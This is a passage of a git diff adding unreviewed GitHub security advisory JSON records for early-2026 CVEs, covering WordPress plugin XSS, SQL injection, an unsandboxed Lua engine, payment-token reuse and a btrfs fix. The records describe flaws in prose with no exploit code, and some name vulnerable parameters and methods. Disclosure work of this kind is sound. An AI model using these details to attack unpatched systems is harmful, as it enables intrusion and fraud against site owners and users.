+ "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-listserver-isdbexist-absolute-directory-traversal-to-file-enumeration" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vphr-3gfg-4g86/GHSA-vphr-3gfg-4g86.json b/advisories/unreviewed/2026/02/GHSA-vphr-3gfg-4g86/GHSA-vphr-3gfg-4g86.json new file mode 100644 index 0000000000000..9620c3f39bd2f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vphr-3gfg-4g86/GHSA-vphr-3gfg-4g86.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vphr-3gfg-4g86", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2024-36324" + ], + "details": "Improper input validation in AMD Graphics Driver could allow an attacker to supply a specially crafted pointer, potentially leading to arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36324" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vpqr-79qg-79p9/GHSA-vpqr-79qg-79p9.json b/advisories/unreviewed/2026/02/GHSA-vpqr-79qg-79p9/GHSA-vpqr-79qg-79p9.json new file mode 100644 index 0000000000000..75e2d755b8aa7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vpqr-79qg-79p9/GHSA-vpqr-79qg-79p9.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vpqr-79qg-79p9", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2025-13650" + ], + "details": "An attacker with access to the web application ZeusWeb of the provider Microcom (in this case, registration is not necessary, but the action must be performed) who has the vulnerable software could introduce arbitrary JavaScript by injecting an XSS payload into the ‘Surname’ parameter of the ‘Create Account’ operation at the URL:  https://zeus.microcom.es:4040/index.html?zeus6=true . This issue affects ZeusWeb: 6.1.31.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13650" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-CVE-2025-13650" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-HRTU-0001" + }, + { + "type": "WEB", + "url": "https://www.microcom360.com/servicio-zeus-web" + }, + { + "type": "WEB", + "url": "https://zeus.microcom.es:4040" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vpw9-rw58-f7gh/GHSA-vpw9-rw58-f7gh.json b/advisories/unreviewed/2026/02/GHSA-vpw9-rw58-f7gh/GHSA-vpw9-rw58-f7gh.json new file mode 100644 index 0000000000000..321768a577a8e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vpw9-rw58-f7gh/GHSA-vpw9-rw58-f7gh.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vpw9-rw58-f7gh", + "modified": "2026-02-17T06:31:26Z", + "published": "2026-02-17T06:31:25Z", + "aliases": [ + "CVE-2026-2592" + ], + "details": "The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' failing to validate that the authority token provided in the callback URL belongs to the specific order being marked as paid. This makes it possible for unauthenticated attackers to potentially mark orders as paid without proper payment by reusing a valid authority token from a different transaction of the same amount.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2592" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/zarinpal-woocommerce-payment-gateway/trunk/class-wc-gateway-zarinpal.php#L359" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/zarinpal-woocommerce-payment-gateway/trunk/class-wc-gateway-zarinpal.php#L370" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/zarinpal-woocommerce-payment-gateway/trunk/class-wc-gateway-zarinpal.php#L380" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/zarinpal-woocommerce-payment-gateway/trunk/class-wc-gateway-zarinpal.php#L409" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/zarinpal-woocommerce-payment-gateway/trunk/class-wc-gateway-zarinpal.php#L412" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3445917" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e33fcd17-318b-408e-86bf-b4ece46121cc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T05:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vq48-824m-7qhf/GHSA-vq48-824m-7qhf.json b/advisories/unreviewed/2026/02/GHSA-vq48-824m-7qhf/GHSA-vq48-824m-7qhf.json new file mode 100644 index 0000000000000..7ff2918c99944 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vq48-824m-7qhf/GHSA-vq48-824m-7qhf.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vq48-824m-7qhf", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T15:31:35Z", + "aliases": [ + "CVE-2026-22208" + ], + "details": "OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capability restrictions, exposing standard libraries such as 'os' and 'io' to untrusted portrayal catalogues. An attacker can provide a malicious S-100 portrayal catalogue containing Lua scripts that execute arbitrary commands with the privileges of the OpenS100 process when a user imports the catalogue and loads a chart.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22208" + }, + { + "type": "WEB", + "url": "https://github.com/S-100ExpertTeam/OpenS100/commit/753cf294434e8d3961f20a567c4d99151e3b530d" + }, + { + "type": "WEB", + "url": "https://www.mdpi.com/1424-8220/26/4/1246" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/opens100-portrayal-engine-unrestricted-lua-standard-library-access" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-749" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T15:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json b/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json new file mode 100644 index 0000000000000..44893b54091aa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vq94-wmm9-737m", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-15560" + ], + "details": "An authenticated attacker with minimal permissions can exploit a SQL injection in the WorkTime server \"widget\" API endpoint to inject SQL queries. If the Firebird backend is used, attackers are able to retrieve all data from the database backend. If the MSSQL backend is used the attacker can execute arbitrary SQL statements on the database backend and gain access to sensitive data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15560" + }, + { + "type": "WEB", + "url": "https://r.sec-consult.com/worktime" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T11:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json b/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json new file mode 100644 index 0000000000000..248e19f7829d5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqcj-rgfw-jjcq", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23214" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: reject new transactions if the fs is fully read-only\n\n[BUG]\nThere is a bug report where a heavily fuzzed fs is mounted with all\nrescue mount options, which leads to the following warnings during\nunmount:\n\n BTRFS: Transaction aborted (error -22)\n Modules linked in:\n CPU: 0 UID: 0 PID: 9758 Comm: repro.out Not tainted\n 6.19.0-rc5-00002-gb71e635feefc #7 PREEMPT(full)\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\n RIP: 0010:find_free_extent_update_loop fs/btrfs/extent-tree.c:4208 [inline]\n RIP: 0010:find_free_extent+0x52f0/0x5d20 fs/btrfs/extent-tree.c:4611\n Call Trace:\n \n btrfs_reserve_extent+0x2cd/0x790 fs/btrfs/extent-tree.c:4705\n btrfs_alloc_tree_block+0x1e1/0x10e0 fs/btrfs/extent-tree.c:5157\n btrfs_force_cow_block+0x578/0x2410 fs/btrfs/ctree.c:517\n btrfs_cow_block+0x3c4/0xa80 fs/btrfs/ctree.c:708\n btrfs_search_slot+0xcad/0x2b50 fs/btrfs/ctree.c:2130\n btrfs_truncate_inode_items+0x45d/0x2350 fs/btrfs/inode-item.c:499\n btrfs_evict_inode+0x923/0xe70 fs/btrfs/inode.c:5628\n evict+0x5f4/0xae0 fs/inode.c:837\n __dentry_kill+0x209/0x660 fs/dcache.c:670\n finish_dput+0xc9/0x480 fs/dcache.c:879\n shrink_dcache_for_umount+0xa0/0x170 fs/dcache.c:1661\n generic_shutdown_super+0x67/0x2c0 fs/super.c:621\n kill_anon_super+0x3b/0x70 fs/super.c:1289\n btrfs_kill_super+0x41/0x50 fs/btrfs/super.c:2127\n deactivate_locked_super+0xbc/0x130 fs/super.c:474\n cleanup_mnt+0x425/0x4c0 fs/namespace.c:1318\n task_work_run+0x1d4/0x260 kernel/task_work.c:233\n exit_task_work include/linux/task_work.h:40 [inline]\n do_exit+0x694/0x22f0 kernel/exit.c:971\n do_group_exit+0x21c/0x2d0 kernel/exit.c:1112\n __do_sys_exit_group kernel/exit.c:1123 [inline]\n __se_sys_exit_group kernel/exit.c:1121 [inline]\n __x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1121\n x64_sys_call+0x2210/0x2210 arch/x86/include/generated/asm/syscalls_64.h:232\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xe8/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n RIP: 0033:0x44f639\n Code: Unable to access opcode bytes at 0x44f60f.\n RSP: 002b:00007ffc15c4e088 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\n RAX: ffffffffffffffda RBX: 00000000004c32f0 RCX: 000000000044f639\n RDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000001\n RBP: 0000000000000001 R08: ffffffffffffffc0 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000246 R12: 00000000004c32f0\n R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001\n \n\nSince rescue mount options will mark the full fs read-only, there should\nbe no new transaction triggered.\n\nBut during unmount we will evict all inodes, which can trigger a new\ntransaction, and triggers warnings on a heavily corrupted fs.\n\n[CAUSE]\nBtrfs allows new transaction even on a read-only fs, this is to allow\nlog replay happen even on read-only mounts, just like what ext4/xfs do.\n\nHowever with rescue mount options, the fs is fully read-only and cannot\nbe remounted read-write, thus in that case we should also reject any new\ntransactions.\n\n[FIX]\nIf we find the fs has rescue mount options, we should treat the fs as\nerror, so that no new transaction can be started.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23214" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1972f44c189c8aacde308fa9284e474c1a5cbd9f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3228b2eceb6c3d7e237f8a5330113dbd164fb90d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a928eecf030a9a5dc5f5ca98332699f379b91963" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vr5h-3wp5-6cwh/GHSA-vr5h-3wp5-6cwh.json b/advisories/unreviewed/2026/02/GHSA-vr5h-3wp5-6cwh/GHSA-vr5h-3wp5-6cwh.json new file mode 100644 index 0000000000000..2ca7cfa5f2868 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vr5h-3wp5-6cwh/GHSA-vr5h-3wp5-6cwh.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vr5h-3wp5-6cwh", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-23541" + ], + "details": "Missing Authorization vulnerability in WPFunnels Mail Mint mail-mint allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Mail Mint: from n/a through <= 1.19.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23541" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/mail-mint/vulnerability/wordpress-mail-mint-plugin-1-19-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vr5h-9ppx-x962/GHSA-vr5h-9ppx-x962.json b/advisories/unreviewed/2026/02/GHSA-vr5h-9ppx-x962/GHSA-vr5h-9ppx-x962.json new file mode 100644 index 0000000000000..01a4d4c49f862 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vr5h-9ppx-x962/GHSA-vr5h-9ppx-x962.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vr5h-9ppx-x962", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37183" + ], + "details": "Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 contains a stack overflow vulnerability that allows attackers to execute arbitrary code by overwriting Structured Exception Handler (SEH) registers. Attackers can craft a malicious payload in the License Name input field to trigger a buffer overflow and execute system commands like calc.exe.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37183" + }, + { + "type": "WEB", + "url": "https://www.alloksoft.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47910" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/allok-rm-rmvb-to-avi-mpeg-dvd-converter-stack-overflow-seh" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vrg2-x2p2-pc67/GHSA-vrg2-x2p2-pc67.json b/advisories/unreviewed/2026/02/GHSA-vrg2-x2p2-pc67/GHSA-vrg2-x2p2-pc67.json new file mode 100644 index 0000000000000..e1cd5f61715f7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vrg2-x2p2-pc67/GHSA-vrg2-x2p2-pc67.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrg2-x2p2-pc67", + "modified": "2026-02-13T21:31:39Z", + "published": "2026-02-13T21:31:39Z", + "aliases": [ + "CVE-2025-36552" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36552" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vrhw-wccx-mc8w/GHSA-vrhw-wccx-mc8w.json b/advisories/unreviewed/2026/02/GHSA-vrhw-wccx-mc8w/GHSA-vrhw-wccx-mc8w.json new file mode 100644 index 0000000000000..0a7e86bd738b5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vrhw-wccx-mc8w/GHSA-vrhw-wccx-mc8w.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrhw-wccx-mc8w", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-13738" + ], + "details": "The Easy Table of Contents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `ez-toc` shortcode in all versions up to, and including, 2.0.78 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13738" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/easy-table-of-contents/tags/2.0.77/includes/class-eztoc-post.php#L1332" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414473%40easy-table-of-contents&new=3414473%40easy-table-of-contents&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7205c238-4419-4292-8f9c-4ccf5b69dd60?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json b/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json new file mode 100644 index 0000000000000..6df91580455d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrm4-h3r4-hh29", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27031" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27031" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json b/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json new file mode 100644 index 0000000000000..f6affccd03956 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vv37-5fmc-w362", + "modified": "2026-02-19T18:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25307" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 8theme XStore Core et-core-plugin allows DOM-Based XSS.This issue affects XStore Core: from n/a through < 5.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25307" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/et-core-plugin/vulnerability/wordpress-xstore-core-plugin-5-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json b/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json new file mode 100644 index 0000000000000..73ab5625a0540 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vvcr-j24q-wc29", + "modified": "2026-02-20T03:31:39Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2025-30410" + ], + "details": "Sensitive data disclosure and manipulation due to missing authentication. The following products are affected: Acronis Cyber Protect Cloud Agent (Linux, macOS, Windows) before build 39870, Acronis Cyber Protect 16 (Linux, macOS, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, macOS, Windows) before build 41800.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30410" + }, + { + "type": "WEB", + "url": "https://security-advisory.acronis.com/advisories/SEC-8641" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vw2m-h749-pv59/GHSA-vw2m-h749-pv59.json b/advisories/unreviewed/2026/02/GHSA-vw2m-h749-pv59/GHSA-vw2m-h749-pv59.json new file mode 100644 index 0000000000000..70460d5124236 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vw2m-h749-pv59/GHSA-vw2m-h749-pv59.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vw2m-h749-pv59", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2025-36018" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 for Z hub component is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36018" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vw5r-3jjm-rpxq/GHSA-vw5r-3jjm-rpxq.json b/advisories/unreviewed/2026/02/GHSA-vw5r-3jjm-rpxq/GHSA-vw5r-3jjm-rpxq.json new file mode 100644 index 0000000000000..1e4eeaa8b45ee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vw5r-3jjm-rpxq/GHSA-vw5r-3jjm-rpxq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vw5r-3jjm-rpxq", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-0724" + ], + "details": "The WPlyr Media Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_wplyr_accent_color' parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0724" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wplyr-media-block/tags/1.3.0/includes/class-wplyr.php#L359" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wplyr-media-block/tags/1.3.0/includes/class-wplyr.php#L434" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wplyr-media-block/trunk/includes/class-wplyr.php#L359" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wplyr-media-block/trunk/includes/class-wplyr.php#L434" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7a4cc65b-b0a7-4002-add4-ceacfe2f54f1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json b/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json new file mode 100644 index 0000000000000..16e327c5f4939 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vw84-mx3m-hw5p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1404" + ], + "details": "The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the filter parameters (e.g., 'filter_first_name') in all versions up to, and including, 2.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": 